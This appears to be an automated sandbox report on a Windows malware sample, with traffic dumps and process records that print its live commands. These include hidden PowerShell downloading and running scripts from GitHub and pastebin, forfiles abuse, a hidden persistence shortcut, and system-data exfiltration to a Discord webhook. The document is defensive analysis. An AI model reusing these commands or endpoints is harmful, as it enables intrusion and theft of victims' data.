                                                                        2024-10-15 14:00:32 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                        2024-10-15 14:00:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549921185.199.110.1334437296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:33 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:34 UTC901INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 7508
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:33 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120137-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 1
                                                                        X-Timer: S1729000834.966828,VS0,VE1
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 8d4ffef0feea02d9669decbe1be041a036f9619f
                                                                        Expires: Tue, 15 Oct 2024 14:05:33 GMT
                                                                        Source-Age: 39
                                                                        2024-10-15 14:00:34 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                        2024-10-15 14:00:34 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                        2024-10-15 14:00:34 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                        2024-10-15 14:00:34 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                        2024-10-15 14:00:34 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                        2024-10-15 14:00:34 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549952162.159.138.2324433136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:40 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Content-Type: application/json
                                                                        Host: discord.com
                                                                        Content-Length: 299
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:40 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 61 6c 66 6f 6e 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 45 53 46 53 38 47 35 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 4ESFS8G5\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                        2024-10-15 14:00:40 UTC1255INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 15 Oct 2024 14:00:40 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 45
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                        x-ratelimit-limit: 5
                                                                        x-ratelimit-remaining: 4
                                                                        x-ratelimit-reset: 1729000841
                                                                        x-ratelimit-reset-after: 1
                                                                        via: 1.1 google
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V5apL0iNoHSriEsYfXs6DkvhAJ6VrV7f%2FFS3lB7uozRivpAB5EybX%2Bzffc49OcE37h6HX3KPu84iVNqf2on7sd3gO98II29SxT8gKjC7HM%2FitB4568wkjtIXWsEj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Content-Type-Options: nosniff
                                                                        Set-Cookie: __cfruid=2ea9685ce586c51b0bca2e633e8796cf617bbecc-1729000840; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                        Set-Cookie: _cfuvid=pfSABZuGpKd97j4bwvkwvMGT1XMDmt46TNQbVDaLbnI-1729000840266-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d30563308774793-DFW
                                                                        2024-10-15 14:00:40 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                        Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549990162.159.138.2324437296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:47 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Content-Type: application/json
                                                                        Host: discord.com
                                                                        Content-Length: 299
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:47 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 61 6c 66 6f 6e 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 45 53 46 53 38 47 35 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 4ESFS8G5\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                        2024-10-15 14:00:47 UTC1257INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 15 Oct 2024 14:00:47 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 45
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                        x-ratelimit-limit: 5
                                                                        x-ratelimit-remaining: 4
                                                                        x-ratelimit-reset: 1729000848
                                                                        x-ratelimit-reset-after: 1
                                                                        via: 1.1 google
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yS%2F3xDx9elF6UPdyjvAxMpz8NOukibj3jNZnbq09xDjG%2FHavC6Pl6RpdvOniPUHPxYFWpFah9vTMLy4MUNszcFDGFp%2B%2FUmatePlZJMMcq8vZw8B4Du9ehCZCqoi7"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Content-Type-Options: nosniff
                                                                        Set-Cookie: __cfruid=c453b1697f233c556eb34ab0a1e46ced33d81e9a-1729000847; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                        Set-Cookie: _cfuvid=AxGKe2q8ncRCpRbVwbVwvBf2CntulAILogF5xavJrSY-1729000847285-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d30565ebc463ab9-DFW
                                                                        2024-10-15 14:00:47 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                        Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:09:59:52
                                                                        Start date:15/10/2024
                                                                        Path:C:\Users\user\Desktop\xK44OOt7vD.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\xK44OOt7vD.exe"
                                                                        Imagebase:0x7ff7ea020000
                                                                        File size:116'736 bytes
                                                                        MD5 hash:5E40E28EED9C4EDE7B34B64B6C58571C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:09:59:58
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)"
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:09:59:58
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:10:00:02
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline"
                                                                        Imagebase:0x7ff6dd280000
                                                                        File size:2'759'232 bytes
                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:10:00:04
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8530.tmp" "c:\Users\user\AppData\Local\Temp\rlfwipso\CSC770B74A1B374466B59916F033873949.TMP"
                                                                        Imagebase:0x7ff6657b0000
                                                                        File size:52'744 bytes
                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:10:00:08
                                                                        Start date:15/10/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe"
                                                                        Imagebase:0x1dd2d2d0000
                                                                        File size:56'320 bytes
                                                                        MD5 hash:BECD67D75C5E7C2411E9F481086CA1E0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:7
                                                                        Start time:10:00:08
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:9
                                                                        Start time:10:00:18
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\attrib.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                        Imagebase:0x7ff764340000
                                                                        File size:23'040 bytes
                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:10:00:21
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                        Imagebase:0x7ff61a9c0000
                                                                        File size:52'224 bytes
                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:10:00:21
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:10:00:21
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:10:00:22
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:10:00:29
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                        Wow64 process (32bit):false
